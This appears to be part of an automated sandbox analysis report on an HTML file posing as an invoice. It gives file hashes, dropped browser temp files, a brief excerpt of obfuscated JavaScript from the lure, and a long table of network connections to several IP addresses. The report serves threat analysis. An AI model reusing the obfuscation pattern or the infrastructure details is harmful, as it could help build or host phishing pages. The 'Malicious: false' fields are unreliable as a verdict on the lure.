SHA-256:	160A426FF2894252CD7CEBBDD6D6B7DA8FCD319C65B70468F10B6690C45D02EF
SHA-512:	F8DA8F95B6ED33542A88AF19028E18AE3D9CE25350A06BFC3FBF433ED2B38FEFA5E639CDDFDAC703FC6CAA7F3313D974B92A3168276B3A016CEB28F27DB0714A
Malicious:	false
IE Cache URL:	https://cdnjs.cloudflare.com/ajax/libs/jquery/3.3.1/jquery.min.js
Preview:	/! jQuery v3.3.1 \| (c) JS Foundation and other contributors \| jquery.org/license /.!function(e,t){"use strict";"object"==typeof module&&"object"==typeof module.exports?module.exports=e.document?t(e,!0):function(e){if(!e.document)throw new Error("jQuery requires a window with a document");return t(e)}:t(e)}("undefined"!=typeof window?window:this,function(e,t){"use strict";var n=[],r=e.document,i=Object.getPrototypeOf,o=n.slice,a=n.concat,s=n.push,u=n.indexOf,l={},c=l.toString,f=l.hasOwnProperty,p=f.toString,d=p.call(Object),h={},g=function e(t){return"function"==typeof t&&"number"!=typeof t.nodeType},y=function e(t){return null!=t&&t===t.window},v={type:!0,src:!0,noModule:!0};function m(e,t,n){var i,o=(t=t\|\|r).createElement("script");if(o.text=e,n)for(i in v)n[i]&&(o[i]=n[i]);t.head.appendChild(o).parentNode.removeChild(o)}function x(e){return null==e?e+"":"object"==typeof e\|\|"function"==typeof e?l[c.call(e)]\|\|"object":typeof e}var b="3.3.1",w=function(e,t){return new w.fn.init(e,t)},

C:\Users\user\AppData\Local\Temp\~DF07F4302587011DD4.TMP Download File
Process:	C:\Program Files\internet explorer\iexplore.exe
File Type:	data
Category:	dropped
Size (bytes):	25441
Entropy (8bit):	0.27918767598683664
Encrypted:	false
SSDEEP:	24:c9lLh9lLh9lIn9lIn9lRx/9lRJ9lTb9lTb9lSSU9lSSU9laAa/9laA:kBqoxxJhHWSVSEab
MD5:	AB889A32AB9ACD33E816C2422337C69A
SHA1:	1190C6B34DED2D295827C2A88310D10A8B90B59B
SHA-256:	4D6EC54B8D244E63B0F04FBE2B97402A3DF722560AD12F218665BA440F4CEFDA
SHA-512:	BD250855747BB4CEC61814D0E44F810156D390E3E9F120A12935EFDF80ACA33C4777AD66257CCA4E4003FEF0741692894980B9298F01C4CDD2D8A9C7BB522FB6
Malicious:	false
Preview:	.............................%..H..M..{y..+.0...(................... ...............................................%..H..M..{y..+.0...(................... ..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\~DF8B5138716A0631E4.TMP Download File
Process:	C:\Program Files\internet explorer\iexplore.exe
File Type:	data
Category:	dropped
Size (bytes):	36325
Entropy (8bit):	0.6483445001804878
Encrypted:	false
SSDEEP:	96:kBqoxKAuvScS+EiIZCpXhtHMh5EHMhWhchvhqW:kBqoxKAuqR+EiIZCpxtq5Eqg65n
MD5:	3123F108676C80A7834C3475F85659E0
SHA1:	C64FC6434F1D3E89DD097E58C130C5CEC2491D4F
SHA-256:	630AC927CE18A66F6264E41098968EB6EE97129A0B064325686D6F2FAF3B95F1
SHA-512:	B868214B27A3F1CEC8D0AEA44ABA023175BAC880725A47A3F4C39D24B841AD3554DD5C7092FE4F99B7EDBAF45E975C11E426AEB598EDC95E74665BE4B9BF67E2
Malicious:	false
Preview:	.............................%..H..M..{y..+.0...(................... ...............................................%..H..M..{y..+.0...(................... ..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\~DF9B8C62206A21CFC2.TMP Download File
Process:	C:\Program Files\internet explorer\iexplore.exe
File Type:	data
Category:	dropped
Size (bytes):	13173
Entropy (8bit):	0.5744575427893369
Encrypted:	false
SSDEEP:	24:c9lLh9lLh9lIn9lIn9loKF9loG9lW3f+ULX+Oc+vA++k:kBqoIRX3mC+Oc+vA++k
MD5:	E58BA60163D8CBCA29D667680DCC6195
SHA1:	64AAE2C267DDFEA35F3962E2C4EC2DE57B5B7B95
SHA-256:	330A2C973ABE6757EAED87AD9604F2ABA74CE1940EA02C849A6F3F71046A2E8D
SHA-512:	848A7BF0F674D65E61CB17C6DB26CCF9C10A1EAE5B9E4FF0F04262E03FFC6A9B5AE85DECA74AB26D9E20B26149D5DF9C6FE803C6EBF96B9FEF203B0D1312A82F
Malicious:	false
Preview:	.............................%..H..M..{y..+.0...(................... ...............................................%..H..M..{y..+.0...(................... ..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

Static File Info

General
File type:	data
Entropy (8bit):	6.155353997239801
TrID:
File name:	cremocompany-Invoice_216083-xlsx.html
File size:	11999
MD5:	1a47aae367d4ac2427943631bd4d08f5
SHA1:	87fc8341efabb13c8a33d6acb28bb6e5a5d23b54
SHA256:	9c7b05df9abde7ae8d91cfea08ca275132a6692bec1875aca9c49f1b74f766c9
SHA512:	1960345e2a4878b36b795eae3b3c3af9d802b4245b7e5c6f960d7e7af03341c1647a7bc1c2a3a55ee8e4ad4742003b3061b168b6738c254fd63107174b8e86ff
SSDEEP:	192:3Yj7Fpt/5Wn0kUCW3LJV6QbArrRv5mzvRC6FAwoJUcqjBEXBLJ/M994fW:3Ylp5Un0ZLWQbABv5mz7cAuM9KW
File Content Preview:	<!doctype html>..<html>....<script>l1l=document.documentMode\|\|document.all;var ca8b5d87=true;ll1=document.layers;lll=window.sidebar;ca8b5d87=(!(l1l&&ll1)&&!(!l1l&&!ll1&&!lll));l_ll=location+'';l11=navigator.userAgent.toLowerCase();function lI1(l1I){return

File Icon


Icon Hash:	f8c89c9a9a998cb8

Network Behavior

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Jan 13, 2021 18:15:06.195069075 CET	49721	80	192.168.2.3	5.189.183.184
Jan 13, 2021 18:15:06.198487043 CET	49722	80	192.168.2.3	5.189.183.184
Jan 13, 2021 18:15:06.243391037 CET	80	49721	5.189.183.184	192.168.2.3
Jan 13, 2021 18:15:06.243505955 CET	49721	80	192.168.2.3	5.189.183.184
Jan 13, 2021 18:15:06.244250059 CET	49721	80	192.168.2.3	5.189.183.184
Jan 13, 2021 18:15:06.246797085 CET	80	49722	5.189.183.184	192.168.2.3
Jan 13, 2021 18:15:06.246876955 CET	49722	80	192.168.2.3	5.189.183.184
Jan 13, 2021 18:15:06.292587042 CET	80	49721	5.189.183.184	192.168.2.3
Jan 13, 2021 18:15:06.292676926 CET	80	49721	5.189.183.184	192.168.2.3
Jan 13, 2021 18:15:06.292779922 CET	49721	80	192.168.2.3	5.189.183.184
Jan 13, 2021 18:15:06.318594933 CET	49721	80	192.168.2.3	5.189.183.184
Jan 13, 2021 18:15:06.367230892 CET	80	49721	5.189.183.184	192.168.2.3
Jan 13, 2021 18:15:06.367373943 CET	49721	80	192.168.2.3	5.189.183.184
Jan 13, 2021 18:15:06.367430925 CET	80	49721	5.189.183.184	192.168.2.3
Jan 13, 2021 18:15:06.367513895 CET	49721	80	192.168.2.3	5.189.183.184
Jan 13, 2021 18:15:06.378423929 CET	49723	443	192.168.2.3	104.20.138.65
Jan 13, 2021 18:15:06.378561020 CET	49724	443	192.168.2.3	104.20.138.65
Jan 13, 2021 18:15:06.418601036 CET	443	49723	104.20.138.65	192.168.2.3
Jan 13, 2021 18:15:06.418700933 CET	443	49724	104.20.138.65	192.168.2.3
Jan 13, 2021 18:15:06.418900013 CET	49723	443	192.168.2.3	104.20.138.65
Jan 13, 2021 18:15:06.419689894 CET	49724	443	192.168.2.3	104.20.138.65
Jan 13, 2021 18:15:06.428778887 CET	49723	443	192.168.2.3	104.20.138.65
Jan 13, 2021 18:15:06.429425001 CET	49724	443	192.168.2.3	104.20.138.65
Jan 13, 2021 18:15:06.469078064 CET	443	49723	104.20.138.65	192.168.2.3
Jan 13, 2021 18:15:06.469481945 CET	443	49724	104.20.138.65	192.168.2.3
Jan 13, 2021 18:15:06.471837044 CET	443	49724	104.20.138.65	192.168.2.3
Jan 13, 2021 18:15:06.471877098 CET	443	49724	104.20.138.65	192.168.2.3
Jan 13, 2021 18:15:06.471946001 CET	49724	443	192.168.2.3	104.20.138.65
Jan 13, 2021 18:15:06.472023010 CET	49724	443	192.168.2.3	104.20.138.65
Jan 13, 2021 18:15:06.473057985 CET	443	49723	104.20.138.65	192.168.2.3
Jan 13, 2021 18:15:06.473097086 CET	443	49723	104.20.138.65	192.168.2.3
Jan 13, 2021 18:15:06.473212004 CET	49723	443	192.168.2.3	104.20.138.65
Jan 13, 2021 18:15:06.473280907 CET	49723	443	192.168.2.3	104.20.138.65
Jan 13, 2021 18:15:06.514328957 CET	49724	443	192.168.2.3	104.20.138.65
Jan 13, 2021 18:15:06.516266108 CET	49723	443	192.168.2.3	104.20.138.65
Jan 13, 2021 18:15:06.520245075 CET	49724	443	192.168.2.3	104.20.138.65
Jan 13, 2021 18:15:06.520473957 CET	49724	443	192.168.2.3	104.20.138.65
Jan 13, 2021 18:15:06.520879030 CET	49723	443	192.168.2.3	104.20.138.65
Jan 13, 2021 18:15:06.554498911 CET	443	49724	104.20.138.65	192.168.2.3
Jan 13, 2021 18:15:06.556305885 CET	443	49724	104.20.138.65	192.168.2.3
Jan 13, 2021 18:15:06.556349993 CET	443	49724	104.20.138.65	192.168.2.3
Jan 13, 2021 18:15:06.556385040 CET	443	49723	104.20.138.65	192.168.2.3
Jan 13, 2021 18:15:06.556402922 CET	49724	443	192.168.2.3	104.20.138.65
Jan 13, 2021 18:15:06.556443930 CET	49724	443	192.168.2.3	104.20.138.65
Jan 13, 2021 18:15:06.557039022 CET	443	49723	104.20.138.65	192.168.2.3
Jan 13, 2021 18:15:06.557079077 CET	443	49723	104.20.138.65	192.168.2.3
Jan 13, 2021 18:15:06.557111025 CET	49723	443	192.168.2.3	104.20.138.65
Jan 13, 2021 18:15:06.557143927 CET	49723	443	192.168.2.3	104.20.138.65
Jan 13, 2021 18:15:06.557548046 CET	49724	443	192.168.2.3	104.20.138.65
Jan 13, 2021 18:15:06.558067083 CET	49723	443	192.168.2.3	104.20.138.65
Jan 13, 2021 18:15:06.560250998 CET	443	49724	104.20.138.65	192.168.2.3
Jan 13, 2021 18:15:06.560373068 CET	443	49724	104.20.138.65	192.168.2.3
Jan 13, 2021 18:15:06.560841084 CET	443	49723	104.20.138.65	192.168.2.3
Jan 13, 2021 18:15:06.560869932 CET	443	49723	104.20.138.65	192.168.2.3
Jan 13, 2021 18:15:06.560935020 CET	49723	443	192.168.2.3	104.20.138.65
Jan 13, 2021 18:15:06.566548109 CET	443	49724	104.20.138.65	192.168.2.3
Jan 13, 2021 18:15:06.566615105 CET	49724	443	192.168.2.3	104.20.138.65
Jan 13, 2021 18:15:06.639504910 CET	443	49724	104.20.138.65	192.168.2.3
Jan 13, 2021 18:15:06.639815092 CET	443	49723	104.20.138.65	192.168.2.3
Jan 13, 2021 18:15:07.100204945 CET	443	49724	104.20.138.65	192.168.2.3
Jan 13, 2021 18:15:07.100250959 CET	443	49724	104.20.138.65	192.168.2.3
Jan 13, 2021 18:15:07.100308895 CET	49724	443	192.168.2.3	104.20.138.65
Jan 13, 2021 18:15:07.100362062 CET	49724	443	192.168.2.3	104.20.138.65
Jan 13, 2021 18:15:07.268269062 CET	49726	443	192.168.2.3	91.207.103.145
Jan 13, 2021 18:15:07.268588066 CET	49725	443	192.168.2.3	91.207.103.145
Jan 13, 2021 18:15:07.334444046 CET	443	49726	91.207.103.145	192.168.2.3
Jan 13, 2021 18:15:07.334492922 CET	443	49725	91.207.103.145	192.168.2.3
Jan 13, 2021 18:15:07.334578991 CET	49726	443	192.168.2.3	91.207.103.145
Jan 13, 2021 18:15:07.334592104 CET	49725	443	192.168.2.3	91.207.103.145
Jan 13, 2021 18:15:07.335191965 CET	49725	443	192.168.2.3	91.207.103.145
Jan 13, 2021 18:15:07.335760117 CET	49726	443	192.168.2.3	91.207.103.145
Jan 13, 2021 18:15:07.401055098 CET	443	49725	91.207.103.145	192.168.2.3
Jan 13, 2021 18:15:07.401468039 CET	443	49726	91.207.103.145	192.168.2.3
Jan 13, 2021 18:15:07.403481960 CET	443	49726	91.207.103.145	192.168.2.3
Jan 13, 2021 18:15:07.403537989 CET	443	49726	91.207.103.145	192.168.2.3
Jan 13, 2021 18:15:07.403568029 CET	443	49726	91.207.103.145	192.168.2.3
Jan 13, 2021 18:15:07.403608084 CET	49726	443	192.168.2.3	91.207.103.145
Jan 13, 2021 18:15:07.403661013 CET	49726	443	192.168.2.3	91.207.103.145
Jan 13, 2021 18:15:07.403670073 CET	49726	443	192.168.2.3	91.207.103.145
Jan 13, 2021 18:15:07.406378984 CET	443	49725	91.207.103.145	192.168.2.3
Jan 13, 2021 18:15:07.406449080 CET	49725	443	192.168.2.3	91.207.103.145
Jan 13, 2021 18:15:07.406486988 CET	443	49725	91.207.103.145	192.168.2.3
Jan 13, 2021 18:15:07.406522989 CET	443	49725	91.207.103.145	192.168.2.3
Jan 13, 2021 18:15:07.406542063 CET	49725	443	192.168.2.3	91.207.103.145
Jan 13, 2021 18:15:07.406578064 CET	49725	443	192.168.2.3	91.207.103.145
Jan 13, 2021 18:15:07.411250114 CET	49726	443	192.168.2.3	91.207.103.145
Jan 13, 2021 18:15:07.411602974 CET	49726	443	192.168.2.3	91.207.103.145
Jan 13, 2021 18:15:07.411787033 CET	49726	443	192.168.2.3	91.207.103.145
Jan 13, 2021 18:15:07.414835930 CET	49725	443	192.168.2.3	91.207.103.145
Jan 13, 2021 18:15:07.415185928 CET	49725	443	192.168.2.3	91.207.103.145
Jan 13, 2021 18:15:07.477705956 CET	443	49726	91.207.103.145	192.168.2.3
Jan 13, 2021 18:15:07.477751970 CET	443	49726	91.207.103.145	192.168.2.3
Jan 13, 2021 18:15:07.477911949 CET	49726	443	192.168.2.3	91.207.103.145
Jan 13, 2021 18:15:07.477952003 CET	49726	443	192.168.2.3	91.207.103.145
Jan 13, 2021 18:15:07.478409052 CET	443	49726	91.207.103.145	192.168.2.3
Jan 13, 2021 18:15:07.478492022 CET	49726	443	192.168.2.3	91.207.103.145
Jan 13, 2021 18:15:07.481379986 CET	443	49725	91.207.103.145	192.168.2.3
Jan 13, 2021 18:15:07.481511116 CET	49725	443	192.168.2.3	91.207.103.145
Jan 13, 2021 18:15:07.481538057 CET	443	49725	91.207.103.145	192.168.2.3
Jan 13, 2021 18:15:07.481599092 CET	49725	443	192.168.2.3	91.207.103.145
Jan 13, 2021 18:15:07.555377007 CET	49725	443	192.168.2.3	91.207.103.145
Jan 13, 2021 18:15:07.556809902 CET	49726	443	192.168.2.3	91.207.103.145
Jan 13, 2021 18:15:07.566236973 CET	49724	443	192.168.2.3	104.20.138.65
Jan 13, 2021 18:15:07.606570959 CET	443	49724	104.20.138.65	192.168.2.3
Jan 13, 2021 18:15:07.609675884 CET	49724	443	192.168.2.3	104.20.138.65
Jan 13, 2021 18:15:07.649996996 CET	443	49724	104.20.138.65	192.168.2.3
Jan 13, 2021 18:15:07.661475897 CET	443	49725	91.207.103.145	192.168.2.3
Jan 13, 2021 18:15:07.663516998 CET	443	49726	91.207.103.145	192.168.2.3
Jan 13, 2021 18:15:07.668013096 CET	49729	443	192.168.2.3	104.16.19.94
Jan 13, 2021 18:15:07.669576883 CET	49730	443	192.168.2.3	104.16.19.94
Jan 13, 2021 18:15:07.708194971 CET	443	49729	104.16.19.94	192.168.2.3
Jan 13, 2021 18:15:07.708311081 CET	49729	443	192.168.2.3	104.16.19.94
Jan 13, 2021 18:15:07.708937883 CET	49729	443	192.168.2.3	104.16.19.94
Jan 13, 2021 18:15:07.709449053 CET	443	49730	104.16.19.94	192.168.2.3
Jan 13, 2021 18:15:07.709539890 CET	49730	443	192.168.2.3	104.16.19.94
Jan 13, 2021 18:15:07.709990025 CET	49730	443	192.168.2.3	104.16.19.94
Jan 13, 2021 18:15:07.719918013 CET	49731	80	192.168.2.3	51.91.224.95
Jan 13, 2021 18:15:07.720843077 CET	49732	80	192.168.2.3	51.91.224.95
Jan 13, 2021 18:15:07.748564005 CET	49733	80	192.168.2.3	216.239.38.21
Jan 13, 2021 18:15:07.748975039 CET	443	49729	104.16.19.94	192.168.2.3
Jan 13, 2021 18:15:07.749428034 CET	49734	80	192.168.2.3	216.239.38.21
Jan 13, 2021 18:15:07.749790907 CET	443	49730	104.16.19.94	192.168.2.3
Jan 13, 2021 18:15:07.751635075 CET	443	49730	104.16.19.94	192.168.2.3
Jan 13, 2021 18:15:07.751676083 CET	443	49730	104.16.19.94	192.168.2.3
Jan 13, 2021 18:15:07.751713037 CET	443	49729	104.16.19.94	192.168.2.3
Jan 13, 2021 18:15:07.751749992 CET	443	49729	104.16.19.94	192.168.2.3
Jan 13, 2021 18:15:07.751763105 CET	49730	443	192.168.2.3	104.16.19.94
Jan 13, 2021 18:15:07.751811028 CET	49730	443	192.168.2.3	104.16.19.94
Jan 13, 2021 18:15:07.751872063 CET	49729	443	192.168.2.3	104.16.19.94
Jan 13, 2021 18:15:07.751898050 CET	49729	443	192.168.2.3	104.16.19.94
Jan 13, 2021 18:15:07.776431084 CET	80	49731	51.91.224.95	192.168.2.3
Jan 13, 2021 18:15:07.776556015 CET	49731	80	192.168.2.3	51.91.224.95
Jan 13, 2021 18:15:07.777118921 CET	80	49732	51.91.224.95	192.168.2.3
Jan 13, 2021 18:15:07.777264118 CET	49732	80	192.168.2.3	51.91.224.95
Jan 13, 2021 18:15:07.778747082 CET	49732	80	192.168.2.3	51.91.224.95
Jan 13, 2021 18:15:07.781029940 CET	49730	443	192.168.2.3	104.16.19.94
Jan 13, 2021 18:15:07.781408072 CET	49730	443	192.168.2.3	104.16.19.94
Jan 13, 2021 18:15:07.781620979 CET	49730	443	192.168.2.3	104.16.19.94
Jan 13, 2021 18:15:07.782176018 CET	49729	443	192.168.2.3	104.16.19.94
Jan 13, 2021 18:15:07.782552958 CET	49729	443	192.168.2.3	104.16.19.94
Jan 13, 2021 18:15:07.783885002 CET	49735	443	192.168.2.3	145.239.131.51
Jan 13, 2021 18:15:07.784718990 CET	49736	443	192.168.2.3	145.239.131.51
Jan 13, 2021 18:15:07.788686991 CET	80	49733	216.239.38.21	192.168.2.3
Jan 13, 2021 18:15:07.788796902 CET	49733	80	192.168.2.3	216.239.38.21
Jan 13, 2021 18:15:07.789536953 CET	80	49734	216.239.38.21	192.168.2.3
Jan 13, 2021 18:15:07.789601088 CET	49734	80	192.168.2.3	216.239.38.21
Jan 13, 2021 18:15:07.789624929 CET	49733	80	192.168.2.3	216.239.38.21
Jan 13, 2021 18:15:07.821059942 CET	443	49730	104.16.19.94	192.168.2.3
Jan 13, 2021 18:15:07.821211100 CET	443	49730	104.16.19.94	192.168.2.3
Jan 13, 2021 18:15:07.821242094 CET	443	49730	104.16.19.94	192.168.2.3
Jan 13, 2021 18:15:07.821266890 CET	443	49730	104.16.19.94	192.168.2.3
Jan 13, 2021 18:15:07.821325064 CET	49730	443	192.168.2.3	104.16.19.94
Jan 13, 2021 18:15:07.821383953 CET	49730	443	192.168.2.3	104.16.19.94
Jan 13, 2021 18:15:07.821475983 CET	443	49730	104.16.19.94	192.168.2.3
Jan 13, 2021 18:15:07.822233915 CET	443	49729	104.16.19.94	192.168.2.3
Jan 13, 2021 18:15:07.822638035 CET	443	49729	104.16.19.94	192.168.2.3
Jan 13, 2021 18:15:07.823065996 CET	443	49729	104.16.19.94	192.168.2.3
Jan 13, 2021 18:15:07.823095083 CET	443	49729	104.16.19.94	192.168.2.3
Jan 13, 2021 18:15:07.823154926 CET	49729	443	192.168.2.3	104.16.19.94
Jan 13, 2021 18:15:07.823184013 CET	49729	443	192.168.2.3	104.16.19.94
Jan 13, 2021 18:15:07.829694033 CET	80	49733	216.239.38.21	192.168.2.3
Jan 13, 2021 18:15:07.830990076 CET	80	49733	216.239.38.21	192.168.2.3
Jan 13, 2021 18:15:07.831037045 CET	80	49733	216.239.38.21	192.168.2.3
Jan 13, 2021 18:15:07.831155062 CET	49733	80	192.168.2.3	216.239.38.21
Jan 13, 2021 18:15:07.834964037 CET	80	49732	51.91.224.95	192.168.2.3
Jan 13, 2021 18:15:07.835081100 CET	80	49732	51.91.224.95	192.168.2.3
Jan 13, 2021 18:15:07.835202932 CET	49732	80	192.168.2.3	51.91.224.95
Jan 13, 2021 18:15:07.836838961 CET	443	49730	104.16.19.94	192.168.2.3
Jan 13, 2021 18:15:07.836869001 CET	443	49730	104.16.19.94	192.168.2.3
Jan 13, 2021 18:15:07.836901903 CET	49730	443	192.168.2.3	104.16.19.94
Jan 13, 2021 18:15:07.836905003 CET	443	49730	104.16.19.94	192.168.2.3
Jan 13, 2021 18:15:07.836930037 CET	49730	443	192.168.2.3	104.16.19.94
Jan 13, 2021 18:15:07.836932898 CET	443	49730	104.16.19.94	192.168.2.3
Jan 13, 2021 18:15:07.836970091 CET	443	49730	104.16.19.94	192.168.2.3
Jan 13, 2021 18:15:07.836970091 CET	49730	443	192.168.2.3	104.16.19.94
Jan 13, 2021 18:15:07.836992979 CET	49730	443	192.168.2.3	104.16.19.94
Jan 13, 2021 18:15:07.836997032 CET	443	49730	104.16.19.94	192.168.2.3
Jan 13, 2021 18:15:07.837013960 CET	49730	443	192.168.2.3	104.16.19.94
Jan 13, 2021 18:15:07.837035894 CET	443	49730	104.16.19.94	192.168.2.3
Jan 13, 2021 18:15:07.837061882 CET	443	49730	104.16.19.94	192.168.2.3
Jan 13, 2021 18:15:07.837074995 CET	49730	443	192.168.2.3	104.16.19.94
Jan 13, 2021 18:15:07.837094069 CET	49730	443	192.168.2.3	104.16.19.94
Jan 13, 2021 18:15:07.837110043 CET	443	49730	104.16.19.94	192.168.2.3
Jan 13, 2021 18:15:07.837119102 CET	49730	443	192.168.2.3	104.16.19.94
Jan 13, 2021 18:15:07.837152958 CET	443	49730	104.16.19.94	192.168.2.3
Jan 13, 2021 18:15:07.837171078 CET	49730	443	192.168.2.3	104.16.19.94
Jan 13, 2021 18:15:07.837182045 CET	443	49730	104.16.19.94	192.168.2.3
Jan 13, 2021 18:15:07.837208986 CET	49730	443	192.168.2.3	104.16.19.94
Jan 13, 2021 18:15:07.837222099 CET	443	49730	104.16.19.94	192.168.2.3
Jan 13, 2021 18:15:07.837240934 CET	49730	443	192.168.2.3	104.16.19.94
Jan 13, 2021 18:15:07.837261915 CET	443	49730	104.16.19.94	192.168.2.3
Jan 13, 2021 18:15:07.837275028 CET	49730	443	192.168.2.3	104.16.19.94
Jan 13, 2021 18:15:07.837300062 CET	443	49730	104.16.19.94	192.168.2.3
Jan 13, 2021 18:15:07.837338924 CET	443	49730	104.16.19.94	192.168.2.3
Jan 13, 2021 18:15:07.837342978 CET	49730	443	192.168.2.3	104.16.19.94
Jan 13, 2021 18:15:07.837359905 CET	49730	443	192.168.2.3	104.16.19.94
Jan 13, 2021 18:15:07.837368965 CET	443	49730	104.16.19.94	192.168.2.3
Jan 13, 2021 18:15:07.837399960 CET	49730	443	192.168.2.3	104.16.19.94
Jan 13, 2021 18:15:07.837429047 CET	49730	443	192.168.2.3	104.16.19.94
Jan 13, 2021 18:15:07.837444067 CET	443	49730	104.16.19.94	192.168.2.3
Jan 13, 2021 18:15:07.837491989 CET	443	49730	104.16.19.94	192.168.2.3
Jan 13, 2021 18:15:07.837532043 CET	49730	443	192.168.2.3	104.16.19.94
Jan 13, 2021 18:15:07.837534904 CET	443	49730	104.16.19.94	192.168.2.3
Jan 13, 2021 18:15:07.837564945 CET	443	49730	104.16.19.94	192.168.2.3
Jan 13, 2021 18:15:07.837583065 CET	49730	443	192.168.2.3	104.16.19.94
Jan 13, 2021 18:15:07.837605953 CET	443	49730	104.16.19.94	192.168.2.3
Jan 13, 2021 18:15:07.837630987 CET	49730	443	192.168.2.3	104.16.19.94
Jan 13, 2021 18:15:07.837645054 CET	443	49730	104.16.19.94	192.168.2.3
Jan 13, 2021 18:15:07.837651014 CET	49730	443	192.168.2.3	104.16.19.94
Jan 13, 2021 18:15:07.837682009 CET	443	49730	104.16.19.94	192.168.2.3
Jan 13, 2021 18:15:07.837702990 CET	49730	443	192.168.2.3	104.16.19.94
Jan 13, 2021 18:15:07.837721109 CET	443	49730	104.16.19.94	192.168.2.3
Jan 13, 2021 18:15:07.837739944 CET	49730	443	192.168.2.3	104.16.19.94
Jan 13, 2021 18:15:07.837760925 CET	443	49730	104.16.19.94	192.168.2.3
Jan 13, 2021 18:15:07.837776899 CET	49730	443	192.168.2.3	104.16.19.94
Jan 13, 2021 18:15:07.837809086 CET	443	49730	104.16.19.94	192.168.2.3
Jan 13, 2021 18:15:07.837816954 CET	49730	443	192.168.2.3	104.16.19.94
Jan 13, 2021 18:15:07.837852001 CET	443	49730	104.16.19.94	192.168.2.3
Jan 13, 2021 18:15:07.837866068 CET	49730	443	192.168.2.3	104.16.19.94
Jan 13, 2021 18:15:07.837889910 CET	443	49730	104.16.19.94	192.168.2.3
Jan 13, 2021 18:15:07.837903976 CET	49730	443	192.168.2.3	104.16.19.94
Jan 13, 2021 18:15:07.837929010 CET	443	49730	104.16.19.94	192.168.2.3
Jan 13, 2021 18:15:07.837944984 CET	49730	443	192.168.2.3	104.16.19.94
Jan 13, 2021 18:15:07.837968111 CET	443	49730	104.16.19.94	192.168.2.3
Jan 13, 2021 18:15:07.837985039 CET	49730	443	192.168.2.3	104.16.19.94
Jan 13, 2021 18:15:07.837996006 CET	443	49730	104.16.19.94	192.168.2.3
Jan 13, 2021 18:15:07.838021994 CET	49730	443	192.168.2.3	104.16.19.94
Jan 13, 2021 18:15:07.838049889 CET	49730	443	192.168.2.3	104.16.19.94
Jan 13, 2021 18:15:07.838061094 CET	443	49730	104.16.19.94	192.168.2.3
Jan 13, 2021 18:15:07.838115931 CET	49730	443	192.168.2.3	104.16.19.94
Jan 13, 2021 18:15:07.840367079 CET	443	49735	145.239.131.51	192.168.2.3
Jan 13, 2021 18:15:07.840471029 CET	49735	443	192.168.2.3	145.239.131.51
Jan 13, 2021 18:15:07.841156960 CET	443	49736	145.239.131.51	192.168.2.3
Jan 13, 2021 18:15:07.841252089 CET	49736	443	192.168.2.3	145.239.131.51
Jan 13, 2021 18:15:08.145580053 CET	443	49724	104.20.138.65	192.168.2.3
Jan 13, 2021 18:15:08.145632982 CET	443	49724	104.20.138.65	192.168.2.3
Jan 13, 2021 18:15:08.145764112 CET	49724	443	192.168.2.3	104.20.138.65
Jan 13, 2021 18:15:08.188178062 CET	49726	443	192.168.2.3	91.207.103.145
Jan 13, 2021 18:15:08.190929890 CET	443	49724	104.20.138.65	192.168.2.3
Jan 13, 2021 18:15:08.190967083 CET	443	49724	104.20.138.65	192.168.2.3
Jan 13, 2021 18:15:08.191024065 CET	49724	443	192.168.2.3	104.20.138.65
Jan 13, 2021 18:15:08.191065073 CET	49724	443	192.168.2.3	104.20.138.65
Jan 13, 2021 18:15:08.254113913 CET	443	49726	91.207.103.145	192.168.2.3
Jan 13, 2021 18:15:08.255400896 CET	49730	443	192.168.2.3	104.16.19.94
Jan 13, 2021 18:15:08.259928942 CET	443	49726	91.207.103.145	192.168.2.3
Jan 13, 2021 18:15:08.259977102 CET	443	49726	91.207.103.145	192.168.2.3
Jan 13, 2021 18:15:08.260024071 CET	443	49726	91.207.103.145	192.168.2.3
Jan 13, 2021 18:15:08.260044098 CET	49726	443	192.168.2.3	91.207.103.145
Jan 13, 2021 18:15:08.260067940 CET	49726	443	192.168.2.3	91.207.103.145
Jan 13, 2021 18:15:08.260067940 CET	443	49726	91.207.103.145	192.168.2.3
Jan 13, 2021 18:15:08.260082006 CET	49726	443	192.168.2.3	91.207.103.145
Jan 13, 2021 18:15:08.260109901 CET	443	49726	91.207.103.145	192.168.2.3
Jan 13, 2021 18:15:08.260142088 CET	49726	443	192.168.2.3	91.207.103.145
Jan 13, 2021 18:15:08.260143042 CET	443	49726	91.207.103.145	192.168.2.3
Jan 13, 2021 18:15:08.260164976 CET	49726	443	192.168.2.3	91.207.103.145
Jan 13, 2021 18:15:08.260183096 CET	443	49726	91.207.103.145	192.168.2.3
Jan 13, 2021 18:15:08.260209084 CET	49726	443	192.168.2.3	91.207.103.145
Jan 13, 2021 18:15:08.260231972 CET	443	49726	91.207.103.145	192.168.2.3
Jan 13, 2021 18:15:08.260257006 CET	49726	443	192.168.2.3	91.207.103.145
Jan 13, 2021 18:15:08.260288954 CET	443	49726	91.207.103.145	192.168.2.3
Jan 13, 2021 18:15:08.260318041 CET	443	49726	91.207.103.145	192.168.2.3
Jan 13, 2021 18:15:08.260376930 CET	49726	443	192.168.2.3	91.207.103.145
Jan 13, 2021 18:15:08.260416031 CET	49726	443	192.168.2.3	91.207.103.145
Jan 13, 2021 18:15:08.264673948 CET	49729	443	192.168.2.3	104.16.19.94
Jan 13, 2021 18:15:08.295027971 CET	49726	443	192.168.2.3	91.207.103.145
Jan 13, 2021 18:15:08.297466040 CET	443	49730	104.16.19.94	192.168.2.3
Jan 13, 2021 18:15:08.304747105 CET	443	49729	104.16.19.94	192.168.2.3
Jan 13, 2021 18:15:08.319449902 CET	49735	443	192.168.2.3	145.239.131.51
Jan 13, 2021 18:15:08.319994926 CET	49736	443	192.168.2.3	145.239.131.51
Jan 13, 2021 18:15:08.326167107 CET	443	49726	91.207.103.145	192.168.2.3
Jan 13, 2021 18:15:08.326189041 CET	443	49726	91.207.103.145	192.168.2.3
Jan 13, 2021 18:15:08.326244116 CET	443	49726	91.207.103.145	192.168.2.3
Jan 13, 2021 18:15:08.326251984 CET	49726	443	192.168.2.3	91.207.103.145
Jan 13, 2021 18:15:08.326289892 CET	49726	443	192.168.2.3	91.207.103.145
Jan 13, 2021 18:15:08.326327085 CET	443	49726	91.207.103.145	192.168.2.3
